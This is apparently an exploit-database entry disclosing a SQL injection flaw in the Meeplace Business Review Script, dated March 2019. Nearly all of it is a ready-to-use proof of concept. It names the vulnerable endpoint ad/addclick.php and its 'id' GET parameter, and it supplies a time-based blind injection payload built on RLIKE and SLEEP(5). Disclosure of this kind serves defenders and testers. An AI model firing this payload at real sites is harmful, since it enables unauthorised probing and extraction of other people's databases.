# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection # Date: 22.03.2019 # Dork: # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: http://www.meeplace.com # Demo Site: http://demo.meeplace.com # Version: Lastest # Tested on: Kali Linux # CVE: N/A ----- PoC: SQLi ----- # Request: http://localhost/[PATH]/ad/addclick.php?&id=1 # Vulnerable Parameter: id (GET) # Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)